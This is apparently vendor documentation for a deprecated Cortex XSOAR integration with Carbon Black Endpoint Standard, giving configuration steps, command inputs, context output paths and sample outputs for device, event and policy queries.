VMware Carbon Black Endpoint Standard (Deprecated)
Deprecated
Use Carbon Black Endpoint Standard instead.
Overview
Use the VMware Carbon Black Endpoint Standard integration to manage Carbon Black policies, devices and processes on Cortex XSOAR.
Use cases
- Get information about events, policies, devices, and processes on Carbon Black.
- Update events, policies, devices, and processes on Carbon Black.
- Delete rules from policies.
- Create new policies.
Configure VMware Carbon Black Endpoint Standard on Cortex XSOAR
- Navigate to Settings > Integrations > Servers & Services.
- Search for VMware Carbon Black Endpoint Standard.
-
Click
Add instance
to create and configure a new integration.
- Name : a textual name for the integration instance.
- Server URL (example: https://192.168.0.1)
- API Key
- API Version
- Connector ID
- Fetch incidents
- Incident type
- SIEM key: Use to fetch incidents.
- SIEM Connector ID: Use to fetch incidents.
- Do not validate server certificate (not secure)
- Use system proxy settings
- Click Test to validate the URLs, token, and connection.
Commands
- Get the status of multiple devices:Â cbd-get-devices-status
- Get the status of a specified device:Â cbd-get-device-status
- Change the security policy assigned to a device: cbd-change-device-status
- Get multiple events:Â cbd-find-events
- Get a specified event:Â cbd-find-event
- Get multiple processes:Â cbd-find-processes
- Get alert details:Â cbd-get-alert-details
- Get all policy details:Â cbd-get-policies
- Get the details of a specified policy:Â cbd-get-policy
- Create a policy:Â cbd-create-policy
- Update a policy:Â cbd-update-policy
- Delete a policy:Â cbd-delete-policy
- Add a rule to a policy:Â cbd-add-rule-to-policy
- Delete a rule from a policy:Â cbd-delete-rule-from-policy
- Update a rule in a policy:Â cbd-update-rule-in-policy
- Set a policy:Â cbd-set-policy
Get the status of multiple devices
Retrieves the status of multiple devices, as specified by further input.
Base Command
cbd-get-devices-status
Input
| Parameter | Description | More Information |
| hostName |
Host name of the device to search for. |
Case insensitive |
| hostNameExact | Exact host name of device to search for | Case sensitive |
| ownerName |
Device owner name |
Case insensitive |
| ownerNameExact | Exact device owner name | Case sensitive |
| ipAddress | External or internal IP address of the device to search for | - |
| start |
Shows result from this row and after |
- |
| rows |
Maximum number of rows of result. |
This parameter can be limited on the Cb Defense server side |
Context Output
| Path | Description |
| CarbonBlackDefense.GetDevicesStatus.Results.ActivationCodeExpiryTime | Activation code expiry time |
| CarbonBlackDefense.GetDevicesStatus.Results.LastExternalIpAddress | Last external IP address |
| CarbonBlackDefense.GetDevicesStatus.Results.LastLocation | Last location |
| CarbonBlackDefense.GetDevicesStatus.Results.LastReportedTime | Last reported time |
| CarbonBlackDefense.GetDevicesStatus.Results.LastShutdownTime | Last shutdown time |
| CarbonBlackDefense.GetDevicesStatus.Results.OsVersion | Operating system version |
| CarbonBlackDefense.GetDevicesStatus.Results.PolicyId | Policy ID |
| CarbonBlackDefense.GetDevicesStatus.Results.RegisteredTime | Registered time |
| CarbonBlackDefense.GetDevicesStatus.Results.Status | Status |
| CarbonBlackDefense.GetDevicesStatus.Results.DeviceId | Device ID |
| CarbonBlackDefense.GetDevicesStatus.Results.DeviceOwnerId | Device owner ID |
| CarbonBlackDefense.GetDevicesStatus.Results.DeviceType Description | Device type |
| CarbonBlackDefense.GetDevicesStatus.Results.OrganizationId | Organization ID |
| CarbonBlackDefense.GetDevicesStatus.Results.SensorVersion | Sensor version |
| CarbonBlackDefense.GetDevicesStatus.Results.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetDevicesStatus.Results.Email | Email address |
| CarbonBlackDefense.GetDevicesStatus.Results.LastContact | Last contact |
| CarbonBlackDefense.GetDevicesStatus.Results.OrganizationName | Organization name |
| CarbonBlackDefense.GetDevicesStatus.Results.SensorStates | Sensor states |
| CarbonBlackDefense.GetDevicesStatus.Results.AvStatus | AV status |
| CarbonBlackDefense.GetDevicesStatus.Results.LastInternalIpAddress | Last internal IP address |
| CarbonBlackDefense.GetDevicesStatus.Results.Name | Name |
| CarbonBlackDefense.GetDevicesStatus.Results.PolicyName | Policy name |
| CarbonBlackDefense.GetDevicesStatus.Results.SensorOutOfDate | Sensor out-of-date |
| CarbonBlackDefense.GetDevicesStatus.Results.TestId | Test ID |
Command Example
!cbd-get-devices-status rows="1"
Context Example
CarbonBlackDefense:{} 1 item
GetDevicesStatus:{} 1 item
Results:{} 25 items
ActivationCodeExpiryTime:1524157210454
AvStatus:null
LastContact:1533646970617
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
| ActivationCodeExpiryTime | 1524157210454 |
|---|---|
| AvStatus | |
| DeviceId | 844355 |
| DeviceOwnerId | 278380 |
| DeviceType | MAC |
| cberninger | |
| LastContact | 1533646970617 |
| LastExternalIpAddress | 67.143.208.113 |
| LastInternalIpAddress | 192.168.2.125 |
| LastLocation | OFFSITE |
| LastReportedTime | 1533642023089 |
| LastShutdownTime | 1533587921518 |
| Name | cberninger-mac2 |
| OrganizationId | 1105 |
| OrganizationName | cb-internal-alliances.com |
| OsVersion | MAC OS X 10.10.5 |
| PolicyId | 6525 |
| PolicyName | default |
| RegisteredTime | 1523552410489 |
| SensorOutOfDate | false |
Get the status of a specified device
Retrieves the status of a specified device.
Base Code
cbd-get-device-status
Input
| Parameter | Description |
| deviceId |
Individual device ID |
Context Output
| Path | Description |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId | Organization ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime | Time of creation |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId | Device ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email | Email address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress | Last internal IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation | Last location |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion | Operating system version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus | AV status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress | Last external IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime | Time of registration |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact | Last contact |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status | Status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId | Test ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId | Policy ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion | Update version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName | Organization name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics | Rooted ByAnalytics |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion | Sensor version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType | Device type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName | Policy name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime | Rooted ByAnalytics Time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate | Sensor out-of-date |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates | Sensor states |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name | Name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id | ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime | Last reported time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId | Device owner ID |
Command Example
!cbd-get-device-status deviceId="844355"
Context Example
CarbonBlackDefense:{} 1 item
GetDeviceStatus:{} 1 item
DeviceInfo:{} 25 items
ActivationCodeExpiryTime:null
AvStatus:null
LastContact:1533648166041
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
| ActivationCodeExpiryTime | |
|---|---|
| AvStatus | |
| DeviceId | 844355 |
| DeviceOwnerId | 278380 |
| DeviceType | MAC |
| cberninger | |
| LastContact | 1533648166041 |
| LastExternalIpAddress | 67.143.208.113 |
| LastInternalIpAddress | 192.168.2.125 |
| LastLocation | OFFSITE |
| LastReportedTime | 1533642023089 |
| LastShutdownTime | 1533587921518 |
| Name | cberninger-mac2 |
| OrganizationId | 1105 |
| OrganizationName | cb-internal-alliances.com |
| OsVersion | MAC OS X 10.10.5 |
| PolicyId | 6525 |
| PolicyName | default |
| RegisteredTime | 1523552410489 |
| SensorOutOfDate | false |
Change the security policy assigned to a device
Changes the security policy assigned to a specified device.
Base Command
cbd-change-device-status
Input
| Parameter | Description |
| deviceId |
The device ID |
| policyId |
The policy ID |
| policyName |
The policy name |
Context Output
| Path | Description |
|---|---|
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId | Organization ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime | Time of creation |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId | Device ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email | Email address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress | Last internal IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation | Last location |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion | Operating system version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus | Anti-virus status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress | Last external IP address |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime | Registration time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact | Last contact |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status | Status |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId | Test ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId | Policy ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion | Update version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName | Organization name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics | Rooted ByAnalytics |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion | Sensor version |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType | Device type |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName | Policy name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime | Rooted ByAnalytics time |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate | Sensor out-of-date date |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates | Sensor states |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name | Name |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id | ID |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime | Time of last report |
| CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId | Device owner ID |
Command Example
!cbd-change-device-status deviceId="844355" policyName="default"
Context Example
CarbonBlackDefense:{} 1 item
ChangeDeviceStatus:{} 1 item
DeviceInfo:{} 24 items
AvStatus:null
LastContact:1533648445513
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
| AvStatus | |
|---|---|
| DeviceId | 844355 |
| DeviceOwnerId | 278380 |
| DeviceType | MAC |
| cberninger | |
| LastContact | 1533648445513 |
| LastExternalIpAddress | 67.143.208.113 |
| LastInternalIpAddress | 192.168.2.125 |
| LastLocation | OFFSITE |
| LastReportedTime | 1533642023089 |
| LastShutdownTime | 1533587921518 |
| Name | cberninger-mac2 |
| OrganizationId | 1105 |
| OrganizationName | cb-internal-alliances.com |
| OsVersion | MAC OS X 10.10.5 |
| PolicyId | 6525 |
| PolicyName | default |
| RegisteredTime | 1523552410489 |
| SensorOutOfDate | false |
| SensorStates | ACTIVE,LIVE_RESPONSE_NOT_RUNNING,LIVE_RESPONSE_NOT_KILLED,LIVE_RESPONSE_DISABLED,SECURITY_CENTER_OPTLN_DISABLED |
Get multiple events
Returns multiple event details, as specified by further input.
Base Command
cbd-find-events
Input
| Parameter | Description | More Information |
| hostName |
The host name of the event to search for |
Case in sensitive. |
| hostNameExact | The exact host name of the event to find | Case sensitive. |
| ownerName | Owner name of the event to search for | Case in sensitive. |
| ownerNameExact | The exact owner name of the event to search for | Case sensitive. |
| ipAddress |
External or internal IP address |
- |
| sha256hash |
Searches for events generated by a process with this SHA-256 hash |
Must be in lowercase. |
| applicationName |
Searches for events generated by a process with this application name |
Must be in lowercase. |
| eventType | Searches for events associated with this event type | - |
| searchWindow |
Events generated within this time frame |
Default is one day. Events might not be available after 30 days due to retention policies. |
| start | Shows result from this row and after | - |
| rows | Maximum number of rows of result | This parameter can be limited on the Cb Defense server side. |
Context Output
| Path | Description |
| CarbonBlackDefense.FindEvents.Results.EventType | Event type |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.MilisSinceProcessStart | Milliseconds since the beginning of the process |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.Name | Name |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.PrivatePid | Private PID |
| CarbonBlackDefense.FindEvents.Results.ProcessDetails.ProcessId | Process ID |
| CarbonBlackDefense.FindEvents.Results.ShortDescription | Short description |
| CarbonBlackDefense.FindEvents.Results.CreateTime | Time of creation |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceName | Device name |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceVersion | Device version |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.PolicyName | Policy name |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityType | Target priority type |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.AgentLocation | Agent location |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceId | Device ID |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpV4Address | IpV4 address of the device |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.AreaCode | Area code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryCode | Country code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Latitude | Latitude |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Longitude | Longitude |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.City | City |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryName | Country name |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.DmaCode | DMA code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.MetroCode | Metro code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.PostalCode | Postal code |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Region | Region |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpAddress | Device IP address |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceType | Device type |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.Email | Email address |
| CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityCode | Target priority code |
| CarbonBlackDefense.FindEvents.Results.EventId | Event ID |
| CarbonBlackDefense.FindEvents.Results.EventTime | Event time |
| CarbonBlackDefense.FindEvents.Results.LongDescription | Long description |
| CarbonBlackDefense.FindEvents.Results.NetFlow.DestAddress | Dest address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.DestPort | Dest port |
| CarbonBlackDefense.FindEvents.Results.NetFlow.PeerFqdn | Peer Fqdn |
| CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpAddress | Peer IP address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpV4Address | Peer IpV4 address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.Service | Service |
| CarbonBlackDefense.FindEvents.Results.NetFlow.SourceAddress | Source address |
| CarbonBlackDefense.FindEvents.Results.NetFlow.SourcePort | Source port |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationName | Application name |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationPath | Application path |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.Md5Hash | MD5 hash |
| CarbonBlackDefense.FindEvents.Results.SelectedApp.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.FindEvents.Results.ThreatIndicators | Threat indicators |
Command Example
!cbd-find-events rows=1
</p?
Context Example
CarbonBlackDefense:{} 1 item
FindEvents:{} 2 items
Results:{} 10 items
ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).
LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.
SelectedApp:{} 7 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
EffectiveReputation:LOCAL_WHITE
EffectiveReputationSource:PRE_EXISTING
Md5Hash:b43632f807770d141008deb988a65ad9
ReputationProperty:NOT_LISTED
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
EventTime:1533649991975
CreateTime:1533650036964
DeviceDetails:{} 12 items
DeviceName:cberninger-mac2
DeviceVersion:MAC OS X 10.10.5
TargetPriorityCode:1
DeviceLocation:{} 6 items
City:null
CountryCode:US
CountryName:United States
Latitude:37.751007
Longitude:-97.822
Region:null
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
DeviceIpAddress:67.143.208.113
DeviceIpV4Address:67.143.208.113
AgentLocation:OFFSITE
Email:cberninger
PolicyName:default
TargetApp:{} 5 items
ApplicationName:null
EffectiveReputation:null
EffectiveReputationSource:null
ReputationProperty:null
Sha256Hash:null
ProcessDetails:{} 11 items
FullUserName:cberninger
PrivatePid:1071-1533502548722-245
ProcessId:1071
Name:cloud-drive-ui
TargetCommandLine:null
MilisSinceProcessStart:147443253
UserName:cberninger
TargetPrivatePid:null
TargetPid:null
TargetName:null
CommandLine:null
EventType:NETWORK
EventId:4ad25ae99a4911e88515b3c49ffeda59
TotalResults:{} 1 item
TotalResults:10666
Endpoint:{} 4 items
Domain:null
Hostname:cberninger-mac2
IPAddress:67.143.208.113
OS:MAC
Process:{} 9 items
Path:null
SHA1:null
ParentID:null
PID:1071
Name:cloud-drive-ui
Endpoint:null
ParentName:null
MD5:null
CommandLine:null
Human Readable
| CreateTime | 1533650036964 |
|---|---|
| DeviceDetails AgentLocation | OFFSITE |
| DeviceDetails DeviceId | 844355 |
| DeviceDetails DeviceIpAddress | 67.143.208.113 |
| DeviceDetails DeviceIpV4Address | 67.143.208.113 |
| DeviceDetails DeviceLocation City | |
| DeviceDetails DeviceLocation CountryCode | US |
| DeviceDetails DeviceLocation CountryName | United States |
| DeviceDetails DeviceLocation Latitude | 37.751007 |
| DeviceDetails DeviceLocation Longitude | -97.822 |
| DeviceDetails DeviceLocation Region | |
| DeviceDetails DeviceName | cberninger-mac2 |
| DeviceDetails DeviceType | MAC |
| DeviceDetails DeviceVersion | MAC OS X 10.10.5 |
| DeviceDetails Email | cberninger |
| DeviceDetails PolicyName | default |
| DeviceDetails TargetPriorityCode | 1 |
| DeviceDetails TargetPriorityType | MEDIUM |
| EventId | 4ad25ae99a4911e88515b3c49ffeda59 |
| EventTime | 1533649991975 |
Get a specified event
Returns a the details of a specified event.
Base Command
cbd-find-event
Input
| Parameter | Description |
| eventId | Event ID |
Context Output
| Path | Description |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ShortDescription | Short description |
| CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ReputationProperty | Reputation property |
| CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.EventType | Event type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Md5Hash | MD5 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationPath | Application path |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ReputationProperty | Reputation property |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationId | Organization ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationName | Organization name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationType | Organization type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.EventInfo.EventId | Event ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.LongDescription | Long description |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpV4Address | Device IpV4 address |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceType | Device type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.Email | Email address |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityCode | Target priority code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.AgentLocation | Agent location path |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceHostName | Device host name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceId | Device ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.GroupName | Group name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceVersion | Device version |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityType | Target priority type |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpAddress | Device IP address |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Latitude | Latitude |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.City | City |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryCode | Country code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.DmaCode | DMA code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Longitude | Longitude |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.MetroCode | Metro code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.PostalCode | Postal code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Region | Region |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.AreaCode | Area code |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryName | Country name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceName | Device name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.CreateTime | Time of creation |
| CarbonBlackDefense.GetAlertDetails.EventInfo.EventTime | Event time |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.FullUserName | Full user name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.Name | Name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentCommandLine | Parent command line |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentName | Parent name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPid | Parent PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ProcessId | Process ID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.CommandLine | Command line |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.MilisSinceProcessStart | Milisecconds since process start |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetCommandLine | Target command line |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPid | Target PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.UserName | User name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPrivatePid | Parent private PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.PrivatePid | Private PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetName | Target name |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPrivatePid | Target private PID |
| CarbonBlackDefense.GetAlertDetails.EventInfo.ThreatIndicators | Threat indicators |
Command Example
!cbd-find-event eventId="4ad25ae99a4911e88515b3c49ffeda59"
Context Example
CarbonBlackDefense:{} 1 item
FindEvent:{} 1 item
EventInfo:{} 13 items
ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).
LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.
EventTime:1533649991975
CreateTime:1533650036964
DeviceDetails:{} 13 items
DeviceName:cberninger-mac2
DeviceVersion:MAC OS X 10.10.5
TargetPriorityCode:1
DeviceHostName:null
GroupName:null
DeviceLocation:{} 10 items
CountryName:United States
CountryCode:US
DmaCode:0
MetroCode:0
City:null
Latitude:37.751007
Longitude:-97.822
Region:null
PostalCode:null
AreaCode:0
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
DeviceIpAddress:67.143.208.113
DeviceIpV4Address:67.143.208.113
AgentLocation:OFFSITE
Email:cberninger
ProcessDetails:{} 15 items
ParentPid:null
FullUserName:cberninger
PrivatePid:1071-1533502548722-245
ProcessId:1071
Name:cloud-drive-ui
TargetCommandLine:null
ParentPrivatePid:null
MilisSinceProcessStart:147443253
ParentName:null
ParentCommandLine:null
UserName:cberninger
TargetPrivatePid:null
TargetPid:null
TargetName:null
CommandLine:null
EventType:NETWORK
EventId:4ad25ae99a4911e88515b3c49ffeda59
ParentHash:{} 2 items
ApplicationName:null
Sha256Hash:null
ProcessHash:{} 5 items
ApplicationName:null
ApplicationPath:null
Md5Hash:null
ReputationProperty:null
Sha256Hash:null
ThreatIndicators:[] 2 items
0:UNKNOWN_APP
1:NETWORK_FLOW
OrgDetails:{} 3 items
OrganizationId:null
OrganizationName:null
OrganizationType:null
TargetHash:{} 3 items
ApplicationName:null
ReputationProperty:null
Sha256Hash:null
Human Readable Output
| CreateTime | 1533650036964 |
|---|---|
| DeviceDetails AgentLocation | OFFSITE |
